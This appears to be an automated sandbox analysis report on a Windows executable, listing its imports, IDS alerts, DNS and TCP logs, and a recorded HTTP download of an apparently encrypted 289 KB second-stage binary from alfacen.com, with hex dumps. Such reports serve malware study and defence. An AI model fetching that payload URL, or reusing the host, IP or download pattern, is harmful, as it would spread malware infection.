                                                    RT_DIALOG0x765800x120dataEnglishUnited States0.5138888888888888
                                                    RT_DIALOG0x766a00x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0x767c00xc4dataEnglishUnited States0.5918367346938775
                                                    RT_DIALOG0x768880x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0x768e80x4cdataEnglishUnited States0.8157894736842105
                                                    RT_MANIFEST0x769380x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                    DLLImport
                                                    ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                    SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                    ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                    COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                    USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                    GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                    KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-05T17:08:55.499395+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849706TCP
                                                    2024-11-05T17:09:34.164818+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849708TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 5, 2024 17:10:33.927103996 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:33.927155018 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:33.927238941 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:33.938698053 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:33.938729048 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:34.833817005 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:34.834039927 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:34.908593893 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:34.908638000 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:34.908977985 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:34.909081936 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:34.912729025 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:34.955342054 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.181643963 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.181672096 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.181746960 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.181797981 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.181818962 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.181828976 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.298274040 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.298645020 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.325149059 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.325306892 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.442070961 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.442310095 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.472428083 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.472559929 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.559041023 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.559127092 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.589821100 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.589906931 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.676245928 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.676317930 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.706913948 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.707003117 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.793245077 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.793338060 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.823893070 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.824001074 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.910445929 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.910676003 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:35.940776110 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:35.940867901 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.027827024 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.027987003 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.054831028 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.054949999 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.103259087 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.103385925 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.145411015 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.145579100 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.175403118 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.175532103 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.262806892 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.262901068 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.305836916 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.305953979 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.306252003 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.306312084 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.379241943 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.379478931 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.422796011 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.422955036 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.423811913 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.423886061 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.496350050 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.496475935 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.540472031 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.540584087 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.571846008 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.571940899 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.613749981 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.613872051 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.657036066 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.657155991 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.689409018 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.689558029 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.730679989 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.730808973 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.774214983 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.774302006 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.806025982 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.806101084 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.847764969 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.847846031 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.874634027 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.874762058 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.891410112 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.891473055 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.891520023 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.891544104 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.891561031 CET44349709193.107.36.30192.168.2.8
                                                    Nov 5, 2024 17:10:36.891575098 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.891588926 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.891614914 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.904716969 CET49709443192.168.2.8193.107.36.30
                                                    Nov 5, 2024 17:10:36.904736042 CET44349709193.107.36.30192.168.2.8
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 5, 2024 17:10:33.828321934 CET5682853192.168.2.81.1.1.1
                                                    Nov 5, 2024 17:10:33.921530962 CET53568281.1.1.1192.168.2.8
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 5, 2024 17:10:33.828321934 CET192.168.2.81.1.1.10xc153Standard query (0)alfacen.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 5, 2024 17:10:33.921530962 CET1.1.1.1192.168.2.80xc153No error (0)alfacen.com193.107.36.30A (IP address)IN (0x0001)false
                                                    • alfacen.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849709193.107.36.304437216C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-05 16:10:34 UTC165OUTGET /escDKcLKdKFF2.bin HTTP/1.1
                                                    User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: alfacen.com
                                                    Cache-Control: no-cache
                                                    2024-11-05 16:10:35 UTC344INHTTP/1.1 200 OK
                                                    Date: Tue, 05 Nov 2024 16:10:35 GMT
                                                    Server: Apache
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Last-Modified: Wed, 16 Oct 2024 10:03:35 GMT
                                                    Accept-Ranges: bytes
                                                    Content-Length: 289344
                                                    Cache-Control: max-age=2592000
                                                    Expires: Thu, 05 Dec 2024 16:10:35 GMT
                                                    Vary: Accept-Encoding
                                                    Content-Type: application/octet-stream
                                                    2024-11-05 16:10:35 UTC7848INData Raw: af 19 74 5b b0 49 12 ff 74 29 76 cf 05 d8 1f 42 56 7e a6 e5 d9 36 c0 21 1b 4a cf c4 87 98 80 f5 32 bf 57 2e 32 3a 43 f6 36 06 04 9d ad db 3c cb a8 39 bd 3b 79 79 5f b0 e7 9c cb 03 50 bb 23 5c 9a 8f 6a e1 f0 4b 48 62 fc 5b 8b c8 97 a8 1f 2b b0 a2 51 91 50 db 3c 1d ac ea d5 9d f0 fe 75 7f 23 5a b9 ab 76 45 d5 e5 ba 0a e7 de 38 d2 e3 66 f7 f5 87 62 15 d4 39 d7 84 bc 14 7e b2 8f 5e c8 cf be 05 a3 9b 9f 5b 5c 57 fa 5b 68 ab 10 1a 24 88 8a f0 de 36 10 bb ea 2b d3 ba 24 f3 61 ef 3a 07 2a 63 91 55 3e c7 f9 75 b2 c3 1b 2d ef ef 6e 03 79 92 4c d2 a4 3d 3a 24 06 a9 40 c3 aa ce 51 52 ea dc 34 a1 fe d0 57 65 e7 1b 6a c6 2c 86 60 20 96 1b 83 44 af 74 f8 3e a1 ee 86 bf f5 55 34 ad 54 6b 46 b6 90 76 9d 87 9e f5 73 e9 33 37 3e 0f b5 e6 4c 41 5b 02 57 02 4c 8a 31 18 cb fe
                                                    Data Ascii: t[It)vBV~6!J2W.2:C6<9;yy_P#\jKHb[+QP<u#ZvE8fb9~^[\W[h$6+$a:*cU>u-nyL=:$@QR4Wej,` Dt>U4TkFvs37>LA[WL1
                                                    2024-11-05 16:10:35 UTC8000INData Raw: e3 cc 8b 72 d5 5e ed 72 f0 54 4b a0 71 0f cd 20 9e 23 d7 83 b8 15 1d ba 92 6f bc 5e 43 eb 5c 9d 26 1e 75 7f 5f 88 32 54 35 fd 83 b0 ef 5f 10 35 b3 10 22 8e e8 f6 45 e9 de 59 3d 97 af 74 61 7f 49 0e a5 41 9d a1 bf d1 44 a0 2f 81 fd 07 56 af d1 81 4f 4c e1 ca 02 59 b2 c4 4b cc 4a be 11 8f 1b 40 c1 be 70 87 48 f4 cd 4f 9c 96 c2 2c 46 38 ba 61 46 49 e5 cc 37 c2 e3 aa ea 45 eb 09 06 8e f0 5c 47 de 23 e9 d5 94 19 57 c3 e8 d3 da 74 12 7c 20 e0 93 3a 76 39 70 4e 8b 0d f4 2b b1 08 6b 7c 1e b5 ab b6 f2 c0 3f da f1 23 bf 5d a3 88 e4 5f d4 3c cc 0f b5 6c 04 43 69 c8 df 1e 17 75 ba d3 a6 fe a1 16 a7 83 ad e6 61 d0 9f ba cd 6f d9 c4 5e 96 35 30 4b e6 85 ba 90 2c 32 8f d2 6f e8 ff dd 21 58 cb 6f 57 12 97 a7 04 9f 2e 20 cb 8c 02 7f 14 51 08 da a1 a8 32 09 4b 2f ff 16 d6
                                                    Data Ascii: r^rTKq #o^C\&u_2T5_5"EY=taIAD/VOLYKJ@pHO,F8aFI7E\G#Wt| :v9pN+k|?#]_<lCiuao^50K,2o!XoW. Q2K/
                                                    2024-11-05 16:10:35 UTC8000INData Raw: 3a 77 fd 87 ec 55 19 50 46 e8 95 e2 4e 59 11 2f 81 46 cd aa 97 53 ad 66 a9 22 98 ba 4e 3d 6e af 32 d8 ed d4 88 46 45 fa 23 19 6f 45 dc 82 04 df c5 3a 91 ea a8 38 d2 1e c3 a2 8a 30 10 ee 0f 95 fe 86 39 83 df 84 4d ae fe 2d 3a 2c ff 94 a6 c6 ff 6e f5 7a 79 40 08 24 da 5a a5 0a ce b5 e1 3e 5b 40 41 f7 f4 26 94 d3 95 1d 77 28 62 12 d6 b7 ee 5b 15 13 0a ad b2 a0 e3 f4 73 a3 4b c9 55 2c d0 ac 85 35 df ce e9 dc 97 cc 67 53 16 1d 36 2e 17 fb 63 b3 9d be d0 22 a9 e4 c3 b5 36 31 33 ba 4f c4 bd 9e da 85 d4 ce 98 cb 29 b1 67 17 11 64 e9 43 a5 a0 29 e0 02 05 51 ec d9 d0 9e b5 2e c7 8d c6 83 3c dd 7f af 5e 72 41 fa 44 79 b5 7f 77 f8 87 01 28 f5 27 09 95 b1 98 25 d6 ed 89 b4 f3 d2 df 4a 5b 05 0c ff 59 72 b8 15 de 42 d7 6e 63 23 05 ed e3 86 9f d1 49 9a fb 9d eb 77 2c 58
                                                    Data Ascii: :wUPFNY/FSf"N=n2FE#oE:809M-:,nzy@$Z>[@A&w(b[sKU,5gS6.c"613O)gdC)Q.<^rADyw('%J[YrBnc#Iw,X
                                                    2024-11-05 16:10:35 UTC8000INData Raw: bb aa 4e 6e 9f 3a 30 73 9c 59 71 8c 22 41 0b fb 76 9b b8 5d 37 01 0f 57 42 1c aa 0c 6c f5 f8 eb bf 08 e1 d9 98 35 22 35 99 b4 f9 40 90 54 04 f2 4a 72 42 4e 2f b5 b1 40 0e 44 0f e5 82 65 92 ef 98 44 5d fa fc ec 89 c0 66 0d f1 4c d9 36 b8 8e 0d 55 98 95 51 74 ef 51 ea ca 05 03 ef ac 02 05 b6 de 4a 39 09 9a ab 56 f6 1b 62 b7 9b b5 b1 d6 9e ba d4 21 90 f5 b9 45 a6 51 1d d9 79 3d d2 47 19 bd 94 0f 99 bc dc a8 a9 52 26 99 a9 43 d2 fb e4 03 40 73 60 ec 97 50 33 e6 f3 52 24 c7 53 69 7b dd bf 48 1c 4c 3a ba cb 19 36 9f 5c 4a 6b ce e2 33 81 ee 3d 1f 2b 11 92 b6 bb d9 77 7f 16 29 20 88 24 6b f0 28 be b5 e0 6c 29 1f 96 9d 0f c5 55 ee ee ef b4 f1 1a 32 0a 01 15 25 9d 3c 21 73 fc ec 05 05 1a 73 ea 06 c4 65 f8 5c c3 1f f9 10 b3 3c e3 1b 77 7b 6b a1 f2 dd a5 60 8b 61 41
                                                    Data Ascii: Nn:0sYq"Av]7WBl5"5@TJrBN/@DeD]fL6UQtQJ9Vb!EQy=GR&C@s`P3R$Si{HL:6\Jk3=+w) $k(l)U2%<!sse\<w{k`aA
                                                    2024-11-05 16:10:35 UTC8000INData Raw: 7f 24 03 e7 ba 6b 47 30 a2 fd 05 c9 67 31 6a 1a d6 df aa 6b 70 a4 bc f4 a0 61 53 92 cc e1 63 10 30 f2 66 93 da ed d3 13 17 3f 74 4e 5e d9 67 6b b5 3b 70 97 a7 3a 50 1b b0 10 1f 0d 40 dd 52 2b 88 9b da 47 f2 79 be ae 17 ca 96 f8 4f d5 1e c8 25 f6 05 e9 b0 da 13 c4 68 01 d1 59 fd 51 c8 17 ec d7 4e 25 f2 e4 60 81 c7 fd e4 b9 8d d0 83 95 27 45 8f b2 b2 81 83 65 a3 5c 40 45 5b 5a ca 6a 5d 22 33 36 82 3f 31 b8 d6 63 ad 4b ab 12 9e cf 37 43 4c 5c b1 33 cd 30 17 81 a8 43 da 32 23 e8 f0 46 4d 3d b6 eb 1f e2 16 8b 7f a5 7d b9 15 8d 3f 76 82 31 0e 24 c0 28 9e 8c ab df db a5 15 18 b9 09 4b 30 6a 15 e9 8f e2 dd 9a 94 0e dd a8 a8 e1 fb 57 00 64 81 7b 57 7d 7b 64 e8 fa 48 e7 5a d2 38 3b d4 70 09 b2 87 66 98 17 6e d5 66 b8 dc 76 35 f2 b1 81 15 7a c6 bc 9d e8 2a f7 f3 4b
                                                    Data Ascii: $kG0g1jkpaSc0f?tN^gk;p:P@R+GyO%hYQN%`'Ee\@E[Zj]"36?1cK7CL\30C2#FM=}?v1$(K0jWd{W}{dHZ8;pfnfv5z*K
                                                    2024-11-05 16:10:35 UTC8000INData Raw: 5c 26 b4 0d bb bb cf da d1 92 e1 00 47 99 fe 28 a5 b5 88 4d 9a 17 b3 15 a9 18 13 b8 48 85 ec 02 ce 8e 73 2c 53 ff 64 04 c0 3a 8d 00 10 64 79 f4 87 4b f9 e0 90 7b 96 d4 42 7d f4 06 00 e2 c7 cc ab 6b 3e b9 7d 6f 5c ed ae d6 b3 5e ec ce 76 31 2e 8a 4e f3 88 cc 38 8f 4e 25 94 4e 62 5e fc 8f 37 ee c8 a2 91 76 6b 8b 5e a9 54 46 70 ec 54 03 c5 16 09 f6 41 12 8b 15 78 d2 25 12 fe fc de 41 69 ae f6 81 bb 52 2d 07 8c 9e 0a 5d 89 a0 fa f6 4c c4 7a 3a 1d 59 3f be b3 6a 61 4a 36 dc 5c 59 46 c2 e5 33 18 a5 a7 cd d7 45 35 58 33 13 7c 25 04 a4 60 db 6c ed 71 ed 68 36 f8 5b c6 5a cd 17 44 e2 12 c1 32 1d e3 21 bf 58 5f 42 85 fd 2e 3f 82 fe 17 16 0d 4f 8a 11 f4 08 9b 70 79 cd fc ef 42 fa d1 20 50 57 76 14 a4 54 81 7d 48 51 d5 ab a3 22 e3 87 16 32 54 49 9f 1a e3 ac 03 c4 c1
                                                    Data Ascii: \&G(MHs,Sd:dyK{B}k>}o\^v1.N8N%Nb^7vk^TFpTAx%AiR-]Lz:Y?jaJ6\YF3E5X3|%`lqh6[ZD2!X_B.?OpyB PWvT}HQ"2TI
                                                    2024-11-05 16:10:35 UTC8000INData Raw: 40 f1 bc cd 3a 57 80 4d 3b 53 d6 28 77 64 ea bc ab 21 fc 0d 5a 4c d1 d7 53 45 9f 0d 8f d1 df 97 80 6f 9b 52 17 d2 1d 01 9b d7 65 4c 56 33 ef cc 2b 0d 84 59 2f ae 09 89 cd 63 cb 69 f0 32 db 4a f8 47 55 c0 1a cc 04 d0 89 2b 9a 15 c1 24 96 e2 cf 54 e9 8b 34 0f 5b b7 43 eb c0 c3 32 7f c5 58 4f d6 dd 0b 37 71 d5 90 81 0f fd 90 7a 72 46 5d 68 98 97 5b 6a 2f dc d9 cf 91 b8 42 3b de ae 5d b5 e4 ad 4d 8f 1b 19 2a 0d 11 28 fa 2a ec 70 66 1c 0e f0 00 30 d4 cf c0 59 2d 34 5b 46 6d 5e ea e4 f6 5f bf 09 c0 87 06 1d dd 80 cc e6 76 41 15 78 f3 31 32 f7 bd 6e 97 a7 07 28 93 8f 20 8b df 0d 5b f8 14 fc d4 6c bb 20 d0 67 55 22 16 ee d6 05 6b e8 7a 67 03 77 27 2e bf ff 7d 45 73 07 ec 86 c6 32 a0 9b 05 f5 cf f2 96 b3 ef 7a f6 59 6c a2 3a 27 9e c0 79 4a 88 75 ed 09 28 21 cb b7
                                                    Data Ascii: @:WM;S(wd!ZLSEoReLV3+Y/ci2JGU+$T4[C2XO7qzrF]h[j/B;]M*(*pf0Y-4[Fm^_vAx12n( [l gU"kzgw'.}Es2zYl:'yJu(!
                                                    2024-11-05 16:10:35 UTC8000INData Raw: a1 c4 e4 45 26 0f 0d 2e fd 88 11 ea 0b ca ed 66 a1 47 d8 5b 5d b7 b6 69 2f 71 ff 71 42 11 75 8f ad ba 0b 62 83 7f 49 67 03 9f c8 ab 00 99 a1 5c 1f a8 10 8c 32 f3 b0 74 a3 61 60 9b 33 08 c2 45 90 15 fb 7e e6 24 fe 20 c6 93 4c f9 bd 8d 56 8a b2 86 08 d1 af 1c af c8 07 8f e2 cf 05 eb 08 3b ae dc 43 d8 a2 5a 78 7c dd c8 d3 c7 d6 57 52 3d fa 97 e9 7f 68 10 01 09 ed 25 4f 64 93 48 2d 36 75 6c 65 50 28 7b 1e a9 c2 99 8f 35 72 8e 8a 84 6f f1 48 40 a7 be f9 d7 87 0c ed 22 7f a9 2f bd 8f bf 58 85 c3 48 ea c4 ce 77 2e fb f4 58 39 08 2a 7e 4f 8c 48 7c 2f 2d f7 a9 c6 20 8d 3c 88 3f 42 14 0f 85 13 a2 ee bb a9 f6 98 d1 7e fb 59 b9 b0 3f 8e 73 84 23 00 e5 62 df 54 20 50 67 fa c4 30 8b b8 04 94 b6 4f f8 ce b0 64 fe b5 b9 35 a5 23 0b 1a e9 27 d7 ca 07 f0 ac 77 6c 5e 3f 68
                                                    Data Ascii: E&.fG[]i/qqBubIg\2ta`3E~$ LV;CZx|WR=h%OdH-6uleP({5roH@"/XHw.X9*~OH|/- <?B~Y?s#bT Pg0Od5#'wl^?h
                                                    2024-11-05 16:10:35 UTC8000INData Raw: 08 c2 0a 28 56 48 88 ae 0a 09 7a dd ea f7 31 33 5d 64 ec a2 a6 20 4b cd c7 92 b0 35 12 77 c6 42 d9 54 a1 30 ce 70 c2 a0 87 6e 86 eb d0 df 73 f4 47 61 e3 db 39 93 af 3d 25 0a 50 ea 7c 73 93 c8 f0 a3 76 04 7e 6e 23 ba b5 b0 9c 73 35 70 09 dc 63 11 ce 0e 1e 1d 15 23 6a 2d 84 19 1e c5 42 de d2 26 55 3b 57 fc 5f 46 83 1a de c5 d4 dc 49 74 62 de b9 7e 39 9f c1 a8 25 0b 7d 01 40 94 54 18 c9 5f 63 42 55 e6 04 8c 21 54 de 61 5c 2b 6c 37 79 a0 5f 76 ec 1b f5 bf fd f9 ba 39 35 1d 74 c6 ee ae 35 f8 8c 42 ef ce b9 00 ad 2d 0c ac 88 7a 6e 2e c1 b1 b6 ff d5 36 ea 3a b9 1e 95 e0 e9 64 a7 89 12 98 6c c7 3d 04 8c cf 11 b9 a8 fc 61 00 46 19 b1 8a 1d c2 f1 ef 18 66 3a a7 76 f9 cb 2e 93 b4 d6 66 7a 0d a5 a0 3b 67 14 fb d8 e4 32 14 86 d4 a6 f8 e0 4a 68 aa 11 cc b6 ef af 30 9f
                                                    Data Ascii: (VHz13]d K5wBT0pnsGa9=%P|sv~n#s5pc#j-B&U;W_FItb~9%}@T_cBU!Ta\+l7y_v95t5B-zn.6:dl=aFf:v.fz;g2Jh0
                                                    2024-11-05 16:10:35 UTC8000INData Raw: 6b 9a 5f be 33 1c d9 0a f9 ea 4d 6c 17 d5 c7 6b d5 c5 6d 67 90 62 09 38 fe 44 41 0a 0a 50 b9 5b aa a5 b9 d7 3b 9a 9e 37 f4 c4 2e 2e cb 07 b5 d7 b2 8e bd 50 90 0d 48 a2 a2 f3 5a 78 3c ae fd 2a a2 cf 93 33 da 8a 7f cb 1d d9 d2 40 4a b5 16 60 be f0 4c 27 07 a9 8d 09 15 e2 15 0f 7e 0e d7 1c eb 8f 62 67 72 e5 a7 88 a8 af 72 20 17 ff 43 30 51 02 28 76 d1 13 14 49 cb 6d e4 6d be ac f7 fe cf d3 03 86 0f 92 51 00 ea 13 d3 9a 92 8e f9 c9 46 8c 4e 05 d2 95 8c 56 de 2d 3e 4b f5 25 d0 fb cc c3 19 26 85 0e 7e 99 30 f7 8b c8 ae cc 69 9a 16 13 89 b9 ab be 29 7b 78 bd 32 ee 08 5b 38 0d 63 c8 27 c6 8d b6 b1 5f 39 40 a0 30 e7 03 7a 5d 5d 5b b7 24 47 77 a8 21 bd 83 b2 aa 64 0c e2 e1 de 0b 11 85 90 2c 98 0e bb 44 dc c2 5a 05 ab 8f cc 5c 0c 5b f3 08 3f ee 82 c2 80 88 d0 81 3c
                                                    Data Ascii: k_3Mlkmgb8DAP[;7..PHZx<*3@J`L'~bgrr C0Q(vImmQFNV->K%&~0i){x2[8c'_9@0z]][$Gw!d,DZ\[?<


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:11:08:36
                                                    Start date:05/11/2024
                                                    Path:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\0GuwV0t2UU.exe"
                                                    Imagebase:0x400000
                                                    File size:695'648 bytes
                                                    MD5 hash:4EA3D3A468F53CA1B57D8C2DB7EB3037
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
